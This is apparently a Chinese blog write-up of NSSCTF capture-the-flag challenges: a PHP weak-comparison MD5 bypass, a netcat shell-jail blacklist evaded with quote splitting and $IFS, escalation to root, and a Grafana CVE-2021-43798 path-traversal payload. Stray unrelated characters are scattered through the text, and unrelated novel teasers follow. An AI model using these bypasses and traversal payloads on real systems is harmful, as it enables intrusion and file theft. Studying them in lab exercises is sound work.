2023-04-18

NSS第一題

image.png
通過閱讀代碼,可以看出是要求你通過POST請求傳遞一個id為"wllmNB"參數(shù)的同時,通過get請求也傳遞一個json格式的參數(shù),關(guān)鍵payload如下:

POST /?json={"x":"wllm"} HTTP/1.1
...

id=wllmNB

第二題easy MD5

image.png
POST糕殉、GET、MD5匹配

仔細(xì)閱讀代碼發(fā)現(xiàn)

if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    } 

既要兩變量個值不相同俗批,又要兩個變量md5值一樣炊豪,
可以發(fā)現(xiàn)此時判斷md5值是否一樣用的是==在跳,這是php的弱類型比較,
方法一: 可以使用帶0e開頭的數(shù)字穿進(jìn)行傳遞參數(shù)零如,
        因為php會將0e開頭的數(shù)字轉(zhuǎn)化為0躏将,故此時md5值相等,而兩個變量值不相等考蕾;
方法二: 可以傳遞數(shù)組祸憋,如name[]=123,password[]=456,md5不能加密數(shù)組肖卧,故兩個md5返回的都是null

另:若遇到===這樣的強類型比較蚯窥,方法一就失效了,
    方法二仍然有效塞帐,或者還可以使用軟件fastcoll進(jìn)行md5碰撞拦赠,生成兩個字符串使得他們的md5值相同

nc簽到題

直接nc連接就可以

nc 1.14.71.254 28184

root@2837d425b7c744ca:/# cat mai
cat main.py 
import os

art = '''

   ((  "####@@!!$$    ))
       `#####@@!$$`  ))
    ((  '####@!!$:
   ((  ,####@!!$:   ))
       .###@!!$:
       `##@@!$:
        `#@!!$
  !@#    `#@!$:       @#$
   #$     `#@!$:       !@!
            '@!$:
        '`\   "!$: /`'
           '\  '!: /'
             "\ : /"
  -."-/\\\-."http://.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."http://.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")


blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']

while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

過濾了空格、ls葵姥、cat荷鼠、<等,可以使用引號截斷繞過榔幸,

pwd
/



l's'
bin
boot
dev
etc
flag
home
lib
lib64
main.py
media
mnt
opt
proc
root
run
run.sh
sbin
srv
sys
tmp
usr
var


c'at'$IFS$9flag



T世帧!O髋亍牍疏!其他方法!2ζ搿A墼伞!
=======
 a=c;b=a;c=t;$a$b$c$IFS$1flag

nl$IFS$9f*
=======


在bash的shell下瞻惋,nc完了直接輸su厦滤,然后沒反應(yīng),
不用管歼狼,繼續(xù)輸cat flag就出來了哈哈哈馁害,不過我試了一下zsh情況下卻打不通

su 

id
uid=0(root) gid=0(root) groups=0(root)
zsh

id
uid=0(root) gid=0(root) groups=0(root)
這里以后輸入命令就不會有任何限制了

ls
bin
boot
dev

python3 -c "import pty;pty.spawn('/bin/bash')"


root@2837d425b7c744ca:/# ls
ls
bin   dev  flag  lib    main.py  mnt  proc  run     sbin  sys  usr
boot  etc  home  lib64  media    opt  root  run.sh  srv   tmp  var

root@2837d425b7c744ca:/# cat flag
cat flag 
NSSCTF{18d9a291-706e-4f17-9759-90e0af7e985f}
root@2837d425b7c744ca:/# 


NSS 實戰(zhàn)

CVE-2021-43798 Grafana任意文件讀取
抓包,修改路徑
/public/plugins/gauge/../../../../../../../../../flag

image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末蹂匹,一起剝皮案震驚了整個濱河市碘菜,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖忍啸,帶你破解...
    沈念sama閱讀 211,561評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件仰坦,死亡現(xiàn)場離奇詭異,居然都是意外死亡计雌,警方通過查閱死者的電腦和手機悄晃,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,218評論 3 385
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來凿滤,“玉大人妈橄,你說我怎么就攤上這事∥檀啵” “怎么了眷蚓?”我有些...
    開封第一講書人閱讀 157,162評論 0 348
  • 文/不壞的土叔 我叫張陵,是天一觀的道長反番。 經(jīng)常有香客問我沙热,道長,這世上最難降的妖魔是什么罢缸? 我笑而不...
    開封第一講書人閱讀 56,470評論 1 283
  • 正文 為了忘掉前任篙贸,我火速辦了婚禮,結(jié)果婚禮上枫疆,老公的妹妹穿的比我還像新娘爵川。我一直安慰自己,他們只是感情好息楔,可當(dāng)我...
    茶點故事閱讀 65,550評論 6 385
  • 文/花漫 我一把揭開白布寝贡。 她就那樣靜靜地躺著,像睡著了一般钞螟。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上谎碍,一...
    開封第一講書人閱讀 49,806評論 1 290
  • 那天鳞滨,我揣著相機與錄音,去河邊找鬼蟆淀。 笑死拯啦,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的熔任。 我是一名探鬼主播褒链,決...
    沈念sama閱讀 38,951評論 3 407
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼疑苔!你這毒婦竟也來了甫匹?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,712評論 0 266
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎兵迅,沒想到半個月后抢韭,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,166評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡恍箭,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,510評論 2 327
  • 正文 我和宋清朗相戀三年刻恭,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片扯夭。...
    茶點故事閱讀 38,643評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡鳍贾,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出交洗,到底是詐尸還是另有隱情骑科,我是刑警寧澤,帶...
    沈念sama閱讀 34,306評論 4 330
  • 正文 年R本政府宣布藕筋,位于F島的核電站纵散,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏隐圾。R本人自食惡果不足惜伍掀,卻給世界環(huán)境...
    茶點故事閱讀 39,930評論 3 313
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望暇藏。 院中可真熱鬧蜜笤,春花似錦、人聲如沸盐碱。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,745評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽瓮顽。三九已至县好,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間暖混,已是汗流浹背缕贡。 一陣腳步聲響...
    開封第一講書人閱讀 31,983評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留拣播,地道東北人晾咪。 一個月前我還...
    沈念sama閱讀 46,351評論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像贮配,于是被迫代替她去往敵國和親谍倦。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,509評論 2 348

推薦閱讀更多精彩內(nèi)容

  • 對于時間管理這個事情我覺得我得好好研究一下泪勒,因為我自己在時間管理上面其實也是不夠細(xì)致的昼蛀,很多時候我發(fā)現(xiàn)我自己...
    零下1度的刺猬閱讀 58評論 0 1
  • 20230418星期二四點五十《死亡文化與生死教育》王云嶺1.2 昨天在學(xué)校聽了一會王嶺云老師講講關(guān)于死亡的問題宴猾,...
    每天堅持閱讀 113評論 0 0
  • 調(diào)查研究三部曲 調(diào)查研究是我們的傳家寶,作為基層的部門曹洽,要深化貫徹落實鳍置,用好調(diào)查研究這個法寶,要制定適合自己的工作...
    新青年_04cb閱讀 63評論 0 0
  • 水與全球健康和食品安全的關(guān)系[https://zhuanlan.zhihu.com/p/622335536] 人生...
    魚河水閱讀 57評論 0 0
  • Science | 改造皮膚細(xì)菌誘導(dǎo)抗黑色素瘤的T細(xì)胞反應(yīng) 原創(chuàng)傅坤元圖靈基因2023-04-18 10:11發(fā)表...
    圖靈基因閱讀 232評論 0 0